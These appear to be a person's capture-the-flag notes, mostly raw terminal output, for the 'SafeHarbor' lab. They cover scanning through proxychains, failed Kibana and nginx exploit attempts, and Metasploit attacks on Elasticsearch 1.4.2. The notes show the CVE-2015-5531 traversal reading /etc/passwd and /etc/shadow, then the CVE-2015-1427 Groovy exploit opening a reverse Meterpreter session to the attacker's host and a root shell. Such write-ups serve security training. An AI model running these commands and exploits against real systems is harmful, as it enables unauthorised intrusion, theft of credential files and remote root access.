[sudo] password for jeff: 
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 05:04 CEST
NSE: Loaded 45 scripts for scanning.
Initiating SYN Stealth Scan at 05:04
Scanning 3 hosts [1 port/host]
Completed SYN Stealth Scan at 05:04, 2.04s elapsed (3 total ports)
Initiating Service scan at 05:04
NSE: Script scanning 3 hosts.
Initiating NSE at 05:04
Completed NSE at 05:04, 0.00s elapsed
Initiating NSE at 05:04
Completed NSE at 05:04, 0.00s elapsed
Nmap scan report for 172.20.0.4
Host is up.

PORT   STATE    SERVICE VERSION
80/tcp filtered http

Nmap scan report for 172.20.0.5
Host is up.

PORT   STATE    SERVICE VERSION
80/tcp filtered http

Nmap scan report for 172.20.0.6
Host is up.

PORT   STATE    SERVICE VERSION
80/tcp filtered http



jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo proxychains nmap -Pn -v -sT -sV -n -p 80 172.20.0.4-6
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 05:04 CEST
NSE: Loaded 45 scripts for scanning.
Initiating Connect Scan at 05:04
Scanning 3 hosts [1 port/host]
Completed NSE at 05:04, 4.47s elapsed
Initiating NSE at 05:04
Completed NSE at 05:04, 1.55s elapsed
Nmap scan report for 172.20.0.4
Host is up (0.10s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.33 ((Unix))

Nmap scan report for 172.20.0.5
Host is up (0.090s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.33 ((Unix))

Nmap scan report for 172.20.0.6
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.33 ((Unix))

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 13.01 seconds




jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains nikto -h 172.20.0.4
ProxyChains-3.1 (http://proxychains.sf.net)
- Nikto v2.1.6
---------------------------------------------------------------------------
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
+ Target IP:          172.20.0.4
+ Target Hostname:    172.20.0.4
+ Target Port:        80
+ Start Time:         2020-05-01 05:52:47 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.33 (Unix)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.2.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
+ No CGI Directories found (use '-C all' to force check all possible dirs)
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
<SNIP>
+ Apache/2.4.33 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
<SNIP>
+ /phpinfo.php: Output from the phpinfo() function was found.
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
<SNIP>
+ ERROR: Error limit (20) reached for host, giving up. Last error: 
+ Scan terminated:  11 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-01 05:53:53 (GMT2) (66 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested



jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains nikto -h 172.20.0.5
ProxyChains-3.1 (http://proxychains.sf.net)
- Nikto v2.1.6
---------------------------------------------------------------------------
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
+ Target IP:          172.20.0.5
+ Target Hostname:    172.20.0.5
+ Target Port:        80
+ Start Time:         2020-05-01 05:55:48 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.33 (Unix)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.2.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
<SNIP>
+ No CGI Directories found (use '-C all' to force check all possible dirs)
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
<SNIP>
+ Apache/2.4.33 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
<SNIP>
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  14 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-05-01 05:58:06 (GMT2) (138 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo proxychains nmap -Pn -sT -p 80 172.20.0.1-254
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 06:08 CEST
|DNS-request| fd0f:ee:b0::1 
|S-chain|-<>-127.0.0.1:8080-<><>-4.2.2.2:53-<><>-OK
|DNS-response|: fd0f:ee:b0::1 does not exist
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.2:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.3:80-<--timeout
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.4:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.5:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.6:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.7:80-<--timeout
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.8:80-<><>-OK
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.9:80-<--timeout
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.12:80-<--timeout
<SNIP>
exit

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo proxychains nmap -Pn -sT -sV -p 80 172.20.0.2,8
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 06:11 CEST

Nmap scan report for 172.20.0.2
Host is up (0.0043s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.8.1

Nmap scan report for 172.20.0.8
Host is up (0.0047s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.17.4


https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

---------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains wget http://172.20.0.2
ProxyChains-3.1 (http://proxychains.sf.net)
--2020-05-01 06:36:51--  http://172.20.0.2/
Connecting to 172.20.0.2:80... |S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.2:80-<><>-OK
connected.
HTTP request sent, awaiting response... 200 OK
Length: 2073 (2.0K) [text/html]
Saving to: ‘index.html’

index.html                                         100%[=============================================================================================================>]   2.02K  --.-KB/s    in 0s      

2020-05-01 06:36:51 (360 MB/s) - ‘index.html’ saved [2073/2073]

jeff@kali:~/Documents/CTFs/SafeHarbor$ cat index.html 
<!DOCTYPE html><!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7"><![endif]--><!--[if IE 7]><html class="no-js lt-ie9 lt-ie8"><![endif]--><!--[if IE 8]><html class="no-js lt-ie9"><![endif]--><!--[if gt IE 8]><!--><html class="no-js"><!--<![endif]--><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=device-width"><title>Kibana 3{{dashboard.current.title ? " - "+dashboard.current.title : ""}}</title><link rel="stylesheet" href="css/bootstrap.light.min.css" title="Light"><link rel="stylesheet" href="css/timepicker.css"><link rel="stylesheet" href="css/animate.min.css"><link rel="stylesheet" href="css/normalize.min.css"><script src="vendor/require/require.js"></script><script src="app/components/require.config.js"></script><script>require(['app'], function () {})</script><style></style></head><body><noscript><div class="container"><center><h3>You must enable javascript to use Kibana</h3></center></div></noscript><link rel="stylesheet" ng-href="css/bootstrap.{{dashboard.current.style||'dark'}}.min.css"><link rel="stylesheet" href="css/bootstrap-responsive.min.css"><link rel="stylesheet" href="css/font-awesome.min.css"><div ng-cloak="" ng-repeat="alert in dashAlerts.list" class="alert-{{alert.severity}} dashboard-notice" ng-show="$last"><button type="button" class="close" ng-click="dashAlerts.clear(alert)" style="padding-right:50px">&times;</button> <strong>{{alert.title}}</strong> <span ng-bind-html="alert.text"></span><div style="padding-right:10px" class="pull-right small">{{$index + 1}} alert(s)</div></div><div ng-cloak="" class="navbar navbar-static-top"><div class="navbar-inner"><div class="container-fluid"><span class="brand"><img src="img/small.png" bs-tooltip="'Kibana '+(kbnVersion=='@REV@'?'master':kbnVersion)" data-placement="bottom"> {{dashboard.current.title}}</span><ul class="nav pull-right" ng-controller="dashLoader" ng-init="init()" ng-include="'app/partials/dashLoader.html'"></ul></div></div></div><div ng-cloak="" ng-view=""></div></body></html>

=> Kibana 3
===============
https://github.com/LandGrey/CVE-2019-7609
https://github.com/mpgn/CVE-2018-17246


jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains python CVE-2019-7609-kibana-rce.py -u http://172.20.0.2:80 -host 192.168.1.22 -port 4444 --shell
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| ::1 
|S-chain|-<>-127.0.0.1:8080-<><>-4.2.2.2:53-<><>-OK
|DNS-response|: ::1 does not exist
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.2:80-<><>-OK
[-] http://172.20.0.2:80 do not exists CVE-2019-7609 vulnerability

=> The kibana does not seem to be vulnerable


=> NGINX 1.8.1
============================
$ python CVE_2017_7529.py http://172.20.0.2/vendor/require/require.js
INFO:__main__:target: http://172.20.0.2/vendor/require/require.js
INFO:__main__:status: 200
INFO:__main__:server: nginx/1.8.1
INFO:__main__:status: 206
INFO:__main__:server: nginx/1.8.1
INFO:__main__:vulnerable: Unknown (206)

$ python CVE_2017_7529.py http://172.20.0.2/proxy/demo.png 
INFO:__main__:target: http://172.20.0.2/proxy/demo.png
INFO:__main__:status: 404
INFO:__main__:server: nginx/1.8.1
INFO:__main__:status: 404
INFO:__main__:server: nginx/1.8.1
INFO:__main__:vulnerable: Unknown (404)


=> The exploit does not work.


msf5 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       172.20.0.1-254   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      3                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > run
[+] 172.20.0.1:           - 172.20.0.1:22 - TCP OPEN
[+] 172.20.0.1:           - 172.20.0.1:80 - TCP OPEN
[+] 172.20.0.2:           - 172.20.0.2:80 - TCP OPEN
[+] 172.20.0.3:           - 172.20.0.3:9600 - TCP OPEN
[+] 172.20.0.6:           - 172.20.0.6:80 - TCP OPEN
[+] 172.20.0.5:           - 172.20.0.5:80 - TCP OPEN
[+] 172.20.0.4:           - 172.20.0.4:80 - TCP OPEN
[+] 172.20.0.8:           - 172.20.0.8:80 - TCP OPEN
[+] 172.20.0.7:           - 172.20.0.7:9000 - TCP OPEN
[*] 172.20.0.1-254:       - Scanned  26 of 254 hosts (10% complete)
<SNIP>
[+] 172.20.0.124:         - 172.20.0.124:9200 - TCP OPEN
[+] 172.20.0.124:         - 172.20.0.124:9300 - TCP OPEN
[+] 172.20.0.138:         - 172.20.0.138:3306 - TCP OPEN
<SNIP>


jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains nmap -v -sT -n -p 9600 172.20.0.3
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 19:16 CEST
Initiating Ping Scan at 19:16
Scanning 172.20.0.3 [2 ports]
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.3:80-<--timeout
Completed Ping Scan at 19:16, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:16
Scanning 172.20.0.3 [1 port]
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.3:9600-<><>-OK
Discovered open port 9600/tcp on 172.20.0.3
Completed Connect Scan at 19:16, 0.01s elapsed (1 total ports)
Nmap scan report for 172.20.0.3
Host is up (0.0039s latency).

PORT     STATE SERVICE
9600/tcp open  micromuse-ncpw

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds
jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains nmap -v -sT -n -p 9000 172.20.0.7
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 19:19 CEST
Initiating Ping Scan at 19:19
Scanning 172.20.0.7 [2 ports]
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.7:80-<--timeout
Completed Ping Scan at 19:19, 0.01s elapsed (1 total hosts)
Initiating Connect Scan at 19:19
Scanning 172.20.0.7 [1 port]
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.7:9000-<><>-OK
Discovered open port 9000/tcp on 172.20.0.7
Completed Connect Scan at 19:19, 0.01s elapsed (1 total ports)
Nmap scan report for 172.20.0.7
Host is up (0.0074s latency).

PORT     STATE SERVICE
9000/tcp open  cslistener

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds


jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains nc 172.20.0.7 9000
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.7:9000-<><>-OK
id
ls
^C

jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains nc -nv 172.20.0.7 9000
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.7:9000-<><>-OK
(UNKNOWN) [172.20.0.7] 9000 (?) open : Operation now in progress


jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains curl http://172.20.0.7:9000
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.7:9000-<><>-OK
curl: (52) Empty reply from server



jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains nmap -v -sT -n -p 9200,9300 172.20.0.124
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 22:14 CEST
Initiating Ping Scan at 22:14
Scanning 172.20.0.124 [2 ports]
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.124:80-<--timeout
Completed Ping Scan at 22:14, 0.13s elapsed (1 total hosts)
Initiating Connect Scan at 22:14
Scanning 172.20.0.124 [2 ports]
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.124:9200-<><>-OK
Discovered open port 9200/tcp on 172.20.0.124
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.124:9300-<><>-OK
Discovered open port 9300/tcp on 172.20.0.124
Completed Connect Scan at 22:14, 0.20s elapsed (2 total ports)
Nmap scan report for 172.20.0.124
Host is up (0.12s latency).

PORT     STATE SERVICE
9200/tcp open  wap-wsp
9300/tcp open  vrace

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds


================================================== Elasticsearch =============================================

jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains curl http://172.20.0.124:9200
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.124:9200-<><>-OK
{
  "status" : 200,
  "name" : "Vulture",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "1.4.2",
    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp" : "2014-12-16T14:11:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}


jeff@kali:~/Documents/CTFs/SafeHarbor$ proxychains curl http://172.20.0.124:9300
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8080-<><>-172.20.0.124:9300-<><>-OK
curl: (52) Empty reply from server



jeff@kali:~/Documents/CTFs/SafeHarbor$ searchsploit elasticsearch
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                                                                                                                  |  Path (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ElasticSearch - Remote Code Execution                                                                                                                           | exploits/linux/remote/36337.py
ElasticSearch - Remote Code Execution                                                                                                                           | exploits/multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)                                                                                                       | exploits/java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download                                                                                                                   | exploits/linux/webapps/38383.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal                                                                                                           | exploits/php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)                                                                                            | exploits/java/remote/33588.rb
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Result



msf5 auxiliary(scanner/portscan/tcp) > search elasticsearch

Matching Modules
================
   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  auxiliary/scanner/elasticsearch/indices_enum                       normal     No     ElasticSearch Indices Enumeration Utility
   1  auxiliary/scanner/http/elasticsearch_traversal                     normal     Yes    ElasticSearch Snapshot API Directory Traversal
   2  exploit/multi/elasticsearch/script_mvel_rce       2013-12-09       excellent  Yes    ElasticSearch Dynamic Script Arbitrary Java Execution
   3  exploit/multi/elasticsearch/search_groovy_script  2015-02-11       excellent  Yes    ElasticSearch Search Groovy Sandbox Bypass
   4  exploit/multi/misc/xdh_x_exec                     2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution


msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/elasticsearch/indices_enum
msf5 auxiliary(scanner/elasticsearch/indices_enum) > options

Module options (auxiliary/scanner/elasticsearch/indices_enum):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    9200             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/elasticsearch/indices_enum) > set RHOSTS 172.20.0.124
RHOSTS => 172.20.0.124
msf5 auxiliary(scanner/elasticsearch/indices_enum) > run

[+] ElasticSearch Indices found: logstash-2019.10.06, logstash-2020.05.01, logstash-2020.04.22, logstash-2020.04.30, logstash-2020.04.23
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



CVE-2015-5531 - ElasticSearch Snapshot API Directory Traversal (Metasploit)
============================================================================
+ Description: 'This module exploits a directory traversal vulnerability in ElasticSearch, allowing an attacker to read arbitrary files with JVM process privileges, through the Snapshot API.' 
+ URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5531


msf5 auxiliary(scanner/elasticsearch/indices_enum) > use auxiliary/scanner/http/elasticsearch_traversal 

msf5 auxiliary(scanner/http/elasticsearch_traversal) > options

Module options (auxiliary/scanner/http/elasticsearch_traversal):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DEPTH     7                yes       Traversal depth
   FILEPATH  /etc/passwd      yes       The path to the file to read
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     9200             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   VHOST                      no        HTTP server virtual host

msf5 auxiliary(scanner/http/elasticsearch_traversal) > set RHOSTS 172.20.0.124
RHOSTS => 172.20.0.124

msf5 auxiliary(scanner/http/elasticsearch_traversal) > run
[*] The target appears to be vulnerable.
[+] File saved in: /root/.msf4/loot/20200501222445_default_172.20.0.124_elasticsearch.tr_564090.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf5 auxiliary(scanner/http/elasticsearch_traversal) > sudo cat /root/.msf4/loot/20200501222445_default_172.20.0.124_elasticsearch.tr_564090.txt

[*] exec: sudo cat /root/.msf4/loot/20200501222445_default_172.20.0.124_elasticsearch.tr_564090.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:108::/var/run/dbus:/bin/false


msf5 auxiliary(scanner/http/elasticsearch_traversal) >

msf5 auxiliary(scanner/http/elasticsearch_traversal) > options

Module options (auxiliary/scanner/http/elasticsearch_traversal):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DEPTH     7                yes       Traversal depth
   FILEPATH  /etc/shadow      yes       The path to the file to read
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    172.20.0.124     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     9200             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   VHOST                      no        HTTP server virtual host

msf5 auxiliary(scanner/http/elasticsearch_traversal) > run
[*] The target appears to be vulnerable.
[+] File saved in: /root/.msf4/loot/20200501223437_default_172.20.0.124_elasticsearch.tr_978779.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 auxiliary(scanner/http/elasticsearch_traversal) > sudo cat /root/.msf4/loot/20200501223437_default_172.20.0.124_elasticsearch.tr_978779.txt

[*] exec: sudo cat /root/.msf4/loot/20200501223437_default_172.20.0.124_elasticsearch.tr_978779.txt
root:*:18149:0:99999:7:::
daemon:*:18149:0:99999:7:::
bin:*:18149:0:99999:7:::
sys:*:18149:0:99999:7:::
sync:*:18149:0:99999:7:::
games:*:18149:0:99999:7:::
man:*:18149:0:99999:7:::
lp:*:18149:0:99999:7:::
mail:*:18149:0:99999:7:::
news:*:18149:0:99999:7:::
uucp:*:18149:0:99999:7:::
proxy:*:18149:0:99999:7:::
www-data:*:18149:0:99999:7:::
backup:*:18149:0:99999:7:::
list:*:18149:0:99999:7:::
irc:*:18149:0:99999:7:::
gnats:*:18149:0:99999:7:::
nobody:*:18149:0:99999:7:::
systemd-timesync:*:18149:0:99999:7:::
systemd-network:*:18149:0:99999:7:::
systemd-resolve:*:18149:0:99999:7:::
systemd-bus-proxy:*:18149:0:99999:7:::
messagebus:*:18175:0:99999:7:::

msf5 auxiliary(scanner/http/elasticsearch_traversal) > set filepath /root/.ssh/authorized_keys
filepath => /root/.ssh/authorized_keys

msf5 auxiliary(scanner/http/elasticsearch_traversal) > run
[*] The target appears to be vulnerable.
[*] Server returned HTTP response code: 404
[*] {"error":"SnapshotMissingException[[pwn:ev1l/../../../../../../..//root/.ssh/authorized_keys] is missing]; nested: FileNotFoundException[dsr/snapshot-ev1l/../../../../../../../root/.ssh/authorized_keys (No such file or directory)]; ","status":404}
[-] No file downloaded
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



CVE-2015-1427 - ElasticSearch Search Groovy Sandbox Bypass (Metasploit)
========================================================================
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. 
The bug is found in the REST API, which does not require authentication, where the search function allows groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes. It can be used to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04. 


msf5 auxiliary(scanner/http/elasticsearch_traversal) > use exploit/multi/elasticsearch/search_groovy_script 
msf5 exploit(multi/elasticsearch/search_groovy_script) > options

Module options (exploit/multi/elasticsearch/search_groovy_script):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      9200             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the ElasticSearch REST API
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   ElasticSearch 1.4.2


msf5 exploit(multi/elasticsearch/search_groovy_script) > set RHOSTS 172.20.0.124
RHOSTS => 172.20.0.124

msf5 exploit(multi/elasticsearch/search_groovy_script) > run

[*] Started reverse TCP handler on 192.168.1.22:4444 
[*] Checking vulnerability...
[*] Discovering TEMP path...
[+] TEMP path on '/tmp'
[*] Discovering remote OS...
[+] Remote OS is 'Linux'
[*] Trying to load metasploit payload...
[*] Sending stage (53906 bytes) to 192.168.1.35
[*] Meterpreter session 3 opened (192.168.1.22:4444 -> 192.168.1.35:52944) at 2020-05-01 22:51:43 +0200
[+] Deleted /tmp/aIlYtkU.jar

meterpreter > getuid
Server username: root
meterpreter > shell
Process 1 created.
Channel 1 created.
bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
782f6cae2a82
pwd
/
ls -al
total 27176
drwxr-xr-x   1 root root     4096 May  1 20:24 .
drwxr-xr-x   1 root root     4096 May  1 20:24 ..
-rwxr-xr-x   1 root root        0 Oct  6  2019 .dockerenv
drwxr-xr-x   2 root root     4096 Sep 10  2019 bin
drwxr-xr-x   2 root root     4096 Jun 14  2018 boot
drwxr-xr-x   5 root root      340 May  1 15:39 dev
drwxr-xr-x   3 root root     4096 May  1 20:36 dsr
drwxr-xr-x   1 root root     4096 Oct  6  2019 elasticsearch
-rw-r--r--   1 root root 27734207 May 16  2018 elasticsearch-1.4.2.tar.gz
drwxr-xr-x   1 root root     4096 Oct  6  2019 etc
drwxr-xr-x   2 root root     4096 Jun 14  2018 home
drwxr-xr-x   1 root root     4096 Oct  6  2019 lib
drwxr-xr-x   2 root root     4096 Sep 10  2019 lib64
-rwxrwxr-x   1 root root      262 Oct  2  2019 main.sh
drwxr-xr-x   2 root root     4096 Sep 10  2019 media
drwxr-xr-x   2 root root     4096 Sep 10  2019 mnt
drwxr-xr-x   2 root root     4096 Sep 10  2019 opt
dr-xr-xr-x 140 root root        0 May  1 15:39 proc
drwx------   1 root root     4096 Oct  6  2019 root
drwxr-xr-x   1 root root     4096 Oct  6  2019 run
drwxr-xr-x   1 root root     4096 Oct  6  2019 sbin
